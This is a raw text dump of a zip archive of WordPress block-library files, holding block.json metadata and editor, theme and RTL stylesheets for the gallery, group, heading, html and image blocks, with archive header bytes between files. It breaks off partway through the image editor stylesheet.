.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){ width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333); } .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){ width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714); } .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){ width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){ width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){ width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{ width:100%; } } .wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{ max-width:420px; width:100%; } .wp-block-gallery.has-nested-images.aligncenter{ justify-content:center; }PK6[#group/block.jsonnu[{ "apiVersion": 2, "name": "core/group", "category": "design", "attributes": { "tagName": { "type": "string", "default": "div" }, "templateLock": { "type": "string" } }, "supports": { "align": [ "wide", "full" ], "anchor": true, "html": false, "color": { "gradients": true, "link": true }, "spacing": { "padding": true }, "__experimentalBorder": { "radius": true } }, "editorStyle": "wp-block-group-editor", "style": "wp-block-group" } PK6[O  group/editor.min.cssnu[.wp-block-group .block-editor-block-list__insertion-point{left:0;right:0}[data-type="core/group"].is-selected .block-list-appender{margin-left:0;margin-right:0}[data-type="core/group"].is-selected .has-background .block-list-appender{margin-bottom:18px;margin-top:18px}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{gap:inherit;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{display:inherit;flex:1;flex-direction:inherit;width:100%}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{border:1px dashed;border-radius:2px;content:"";display:flex;flex:1 0 48px;min-height:46px;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{pointer-events:all}.wp-block-group__placeholder .wp-block-group-placeholder__variations{display:flex;flex-direction:row;flex-wrap:wrap;justify-content:center;list-style:none;margin:0;padding:0;width:100%}.wp-block-group__placeholder .components-placeholder__instructions{margin-bottom:18px;text-align:center}.wp-block-group__placeholder .wp-block-group-placeholder__variations svg{fill:#ccc!important}.wp-block-group__placeholder .wp-block-group-placeholder__variations svg:hover{fill:var(--wp-admin-theme-color)!important}.wp-block-group__placeholder .wp-block-group-placeholder__variations>li{align-items:center;display:flex;flex-direction:column;margin:0 12px 12px;width:auto}.wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button{height:32px;padding:0;width:44px}.wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button:hover{box-shadow:none}.wp-block-group__placeholder .components-placeholder{min-height:auto;padding:24px}.wp-block-group__placeholder .is-medium .wp-block-group-placeholder__variations>li,.wp-block-group__placeholder .is-small .wp-block-group-placeholder__variations>li{margin:12px}PK6[pQe&&group/style-rtl.min.cssnu[.wp-block-group{box-sizing:border-box}PK6[z|'CCgroup/theme.cssnu[:where(.wp-block-group.has-background){ padding:1.25em 2.375em; }PK6[\DT>>group/theme-rtl.min.cssnu[:where(.wp-block-group.has-background){padding:1.25em 2.375em}PK6[X" group/editor.cssnu[.wp-block-group .block-editor-block-list__insertion-point{ left:0; right:0; } [data-type="core/group"].is-selected .block-list-appender{ margin-left:0; margin-right:0; } [data-type="core/group"].is-selected .has-background .block-list-appender{ margin-bottom:18px; margin-top:18px; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ gap:inherit; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ display:inherit; flex:1; flex-direction:inherit; width:100%; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{ border:1px dashed; border-radius:2px; content:""; display:flex; flex:1 0 48px; min-height:46px; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ pointer-events:all; } .wp-block-group__placeholder .wp-block-group-placeholder__variations{ display:flex; flex-direction:row; flex-wrap:wrap; justify-content:center; list-style:none; margin:0; padding:0; width:100%; } .wp-block-group__placeholder .components-placeholder__instructions{ margin-bottom:18px; text-align:center; } .wp-block-group__placeholder .wp-block-group-placeholder__variations svg{ fill:#ccc !important; } .wp-block-group__placeholder .wp-block-group-placeholder__variations svg:hover{ fill:var(--wp-admin-theme-color) !important; } .wp-block-group__placeholder .wp-block-group-placeholder__variations>li{ align-items:center; display:flex; flex-direction:column; margin:0 12px 12px; width:auto; } .wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button{ height:32px; padding:0; width:44px; } .wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button:hover{ box-shadow:none; } .wp-block-group__placeholder .components-placeholder{ min-height:auto; padding:24px; } .wp-block-group__placeholder .is-medium .wp-block-group-placeholder__variations>li,.wp-block-group__placeholder .is-small .wp-block-group-placeholder__variations>li{ margin:12px; }PK6[\DT>>group/theme.min.cssnu[:where(.wp-block-group.has-background){padding:1.25em 2.375em}PK6[pQe&&group/style.min.cssnu[.wp-block-group{box-sizing:border-box}PK6[z|'CCgroup/theme-rtl.cssnu[:where(.wp-block-group.has-background){ padding:1.25em 2.375em; }PK6[X" group/editor-rtl.cssnu[.wp-block-group .block-editor-block-list__insertion-point{ left:0; right:0; } [data-type="core/group"].is-selected .block-list-appender{ margin-left:0; margin-right:0; } [data-type="core/group"].is-selected .has-background .block-list-appender{ margin-bottom:18px; margin-top:18px; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ gap:inherit; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ display:inherit; flex:1; flex-direction:inherit; width:100%; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{ border:1px dashed; border-radius:2px; content:""; display:flex; flex:1 0 48px; min-height:46px; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ pointer-events:all; } .wp-block-group__placeholder .wp-block-group-placeholder__variations{ display:flex; flex-direction:row; flex-wrap:wrap; justify-content:center; list-style:none; margin:0; padding:0; width:100%; } .wp-block-group__placeholder .components-placeholder__instructions{ margin-bottom:18px; text-align:center; } .wp-block-group__placeholder .wp-block-group-placeholder__variations svg{ fill:#ccc !important; } .wp-block-group__placeholder .wp-block-group-placeholder__variations svg:hover{ fill:var(--wp-admin-theme-color) !important; } .wp-block-group__placeholder .wp-block-group-placeholder__variations>li{ align-items:center; display:flex; flex-direction:column; margin:0 12px 12px; width:auto; } .wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button{ height:32px; padding:0; width:44px; } .wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button:hover{ box-shadow:none; } .wp-block-group__placeholder .components-placeholder{ min-height:auto; padding:24px; } .wp-block-group__placeholder .is-medium .wp-block-group-placeholder__variations>li,.wp-block-group__placeholder .is-small .wp-block-group-placeholder__variations>li{ margin:12px; }PK6[O  group/editor-rtl.min.cssnu[.wp-block-group .block-editor-block-list__insertion-point{left:0;right:0}[data-type="core/group"].is-selected .block-list-appender{margin-left:0;margin-right:0}[data-type="core/group"].is-selected .has-background .block-list-appender{margin-bottom:18px;margin-top:18px}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{gap:inherit;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{display:inherit;flex:1;flex-direction:inherit;width:100%}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{border:1px dashed;border-radius:2px;content:"";display:flex;flex:1 0 48px;min-height:46px;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{pointer-events:all}.wp-block-group__placeholder .wp-block-group-placeholder__variations{display:flex;flex-direction:row;flex-wrap:wrap;justify-content:center;list-style:none;margin:0;padding:0;width:100%}.wp-block-group__placeholder .components-placeholder__instructions{margin-bottom:18px;text-align:center}.wp-block-group__placeholder .wp-block-group-placeholder__variations svg{fill:#ccc!important}.wp-block-group__placeholder .wp-block-group-placeholder__variations svg:hover{fill:var(--wp-admin-theme-color)!important}.wp-block-group__placeholder .wp-block-group-placeholder__variations>li{align-items:center;display:flex;flex-direction:column;margin:0 12px 12px;width:auto}.wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button{height:32px;padding:0;width:44px}.wp-block-group__placeholder .wp-block-group-placeholder__variations li>.wp-block-group-placeholder__variation-button:hover{box-shadow:none}.wp-block-group__placeholder .components-placeholder{min-height:auto;padding:24px}.wp-block-group__placeholder .is-medium .wp-block-group-placeholder__variations>li,.wp-block-group__placeholder .is-small .wp-block-group-placeholder__variations>li{margin:12px}PK6[++group/style-rtl.cssnu[.wp-block-group{ box-sizing:border-box; }PK6[++group/style.cssnu[.wp-block-group{ box-sizing:border-box; }PK6[Ȋ|22heading/block.jsonnu[{ "apiVersion": 2, "name": "core/heading", "category": "text", "attributes": { "textAlign": { "type": "string" }, "content": { "type": "string", "source": "html", "selector": "h1,h2,h3,h4,h5,h6", "default": "" }, "level": { "type": "number", "default": 2 }, "placeholder": { "type": "string" } }, "supports": { "align": [ "wide", "full" ], "anchor": true, "className": false, "color": { "link": true }, "fontSize": true, "lineHeight": true, "__experimentalSelector": { "core/heading/h1": { "selector": "h1", "title": "h1", "attributes": { "level": 1 } }, "core/heading/h2": { "selector": "h2", "title": "h2", "attributes": { "level": 2 } }, "core/heading/h3": { "selector": "h3", "title": "h3", "attributes": { "level": 3 } }, "core/heading/h4": { "selector": "h4", "title": "h4", "attributes": { "level": 4 } }, "core/heading/h5": { "selector": "h5", "title": "h5", "attributes": { "level": 5 } }, "core/heading/h6": { "selector": "h6", "title": "h6", "attributes": { "level": 6 } } }, "__unstablePasteTextInline": true }, "editorStyle": "wp-block-heading-editor", "style": "wp-block-heading" } PK6[`.heading/style-rtl.min.cssnu[h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}PK6[`.heading/style.min.cssnu[h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}PK6[Reheading/style-rtl.cssnu[h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{ padding:1.25em 2.375em; } h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){ rotate:180deg; }PK6[Reheading/style.cssnu[h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{ padding:1.25em 2.375em; } h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){ rotate:180deg; }PK6[html/block.jsonnu[{ "apiVersion": 2, "name": "core/html", "category": "widgets", "attributes": { "content": { "type": "string", "source": "html" } }, "supports": { "customClassName": false, "className": false, "html": false }, "editorStyle": "wp-block-html-editor" } PK6[xhtml/editor.min.cssnu[.block-library-html__edit .block-library-html__preview-overlay{height:100%;left:0;position:absolute;top:0;width:100%}.block-library-html__edit .block-editor-plain-text{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important}@media (min-width:600px){.block-library-html__edit .block-editor-plain-text{font-size:13px!important}}.block-library-html__edit .block-editor-plain-text:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid transparent!important}PK6[|pdMMhtml/editor.cssnu[.block-library-html__edit .block-library-html__preview-overlay{ height:100%; left:0; position:absolute; top:0; width:100%; } .block-library-html__edit .block-editor-plain-text{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; } @media (min-width:600px){ .block-library-html__edit .block-editor-plain-text{ font-size:13px !important; } } .block-library-html__edit .block-editor-plain-text:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid transparent !important; }PK6[_NNhtml/editor-rtl.cssnu[.block-library-html__edit .block-library-html__preview-overlay{ height:100%; position:absolute; right:0; top:0; width:100%; } .block-library-html__edit .block-editor-plain-text{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; } @media (min-width:600px){ .block-library-html__edit .block-editor-plain-text{ font-size:13px !important; } } .block-library-html__edit .block-editor-plain-text:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid transparent !important; }PK6[<html/editor-rtl.min.cssnu[.block-library-html__edit .block-library-html__preview-overlay{height:100%;position:absolute;right:0;top:0;width:100%}.block-library-html__edit .block-editor-plain-text{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important}@media (min-width:600px){.block-library-html__edit .block-editor-plain-text{font-size:13px!important}}.block-library-html__edit .block-editor-plain-text:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid transparent!important}PK6[nnimage/block.jsonnu[{ "apiVersion": 2, "name": "core/image", "category": "media", "attributes": { "align": { "type": "string" }, "url": { "type": "string", "source": "attribute", "selector": "img", "attribute": "src" }, "alt": { "type": "string", "source": "attribute", "selector": "img", "attribute": "alt", "default": "" }, "caption": { "type": "string", "source": "html", "selector": "figcaption" }, "title": { "type": "string", "source": "attribute", "selector": "img", "attribute": "title" }, "href": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "href" }, "rel": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "rel" }, "linkClass": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "class" }, "id": { "type": "number" }, "width": { "type": "number" }, "height": { "type": "number" }, "sizeSlug": { "type": "string" }, "linkDestination": { "type": "string" }, "linkTarget": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "target" } }, "supports": { "anchor": true, "__experimentalBorder": { "radius": true } }, "editorStyle": "wp-block-image-editor", "style": "wp-block-image" } PK6[ { image/editor.min.cssnu[.wp-block-image.wp-block-image.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;filter:none!important}.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{opacity:0}.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-image.wp-block-image.is-selected .components-placeholder:before{opacity:0}.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{transition:none}figure.wp-block-image:not(.wp-block){margin:0}.wp-block-image{position:relative}.wp-block-image .is-applying img,.wp-block-image.is-transient img{opacity:.3}.wp-block-image figcaption img{display:inline}.wp-block-image .components-spinner{left:50%;position:absolute;top:50%;transform:translate(-50%,-50%)}.wp-block-image .components-resizable-box__container{display:table}.wp-block-image .components-resizable-box__container img{display:block;height:inherit;width:inherit}.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{left:0;margin:-1px 0;position:absolute;right:0}@media (min-width:600px){.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{margin:-1px}}[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{height:auto;width:100%}.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{display:table}.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{caption-side:bottom;display:table-caption}.wp-block[data-align=left]>.wp-block-image{margin:.5em 1em .5em 0}.wp-block[data-align=right]>.wp-block-image{margin:.5em 0 .5em 1em}.wp-block[data-align=center]>.wp-block-image{margin-left:auto;margin-right:auto;text-align:center}.wp-block-image__crop-area{max-width:100%;overflow:hidden;position:relative;width:100%}.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{border:none;border-radius:0}.wp-block-image__crop-icon{align-items:center;display:flex;justify-content:center;min-width:48px;padding:0 8px}.wp-block-image__crop-icon svg{fill:currentColor}.wp-block-image__zoom .components-popover__content{min-width:260px;overflow:visible!important}.wp-block-image__aspect-ratio{align-items:center;display:flex;height:46px;margin-bottom:-8px}.wp-block-image__aspect-ratio .components-button{padding-left:0;padding-right:0;width:36px}PK6[xMMimage/style-rtl.min.cssnu[.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-image .is-style-rounded img,.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,');mask-image:url('data:image/svg+xml;utf8,');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-left-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-right-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-left-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-right-style:solid}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;-webkit-backdrop-filter:blur(16px) saturate(180%);backdrop-filter:blur(16px) saturate(180%);background-color:rgba(90,90,90,.25);border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;left:16px;opacity:0;padding:0;position:absolute;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto rgba(90,90,90,.25);outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:rgba(90,90,90,.25);border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;overflow:hidden;position:fixed;right:0;top:0;visibility:hidden;width:100vw;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;left:calc(env(safe-area-inset-left) + 16px);min-height:40px;min-width:40px;padding:0;position:absolute;top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);overflow:hidden;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);transform-origin:top right;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:100% 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both;visibility:visible}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active) img{animation:turn-off-visibility .25s both}@media (prefers-reduced-motion:no-preference){.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active){animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc((-50vw + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc((-50vw + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}PK6[5himage/theme.cssnu[.wp-block-image figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-image figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-image{ margin:0 0 1em; }PK6[~ͪimage/theme-rtl.min.cssnu[.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}PK6[([ image/editor.cssnu[.wp-block-image.wp-block-image.is-selected .components-placeholder{ background-color:#fff; border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; filter:none !important; } .wp-block-image.wp-block-image.is-selected .components-placeholder>svg{ opacity:0; } .wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{ display:none; } .wp-block-image.wp-block-image.is-selected .components-placeholder:before{ opacity:0; } .wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{ transition:none; } figure.wp-block-image:not(.wp-block){ margin:0; } .wp-block-image{ position:relative; } .wp-block-image .is-applying img,.wp-block-image.is-transient img{ opacity:.3; } .wp-block-image figcaption img{ display:inline; } 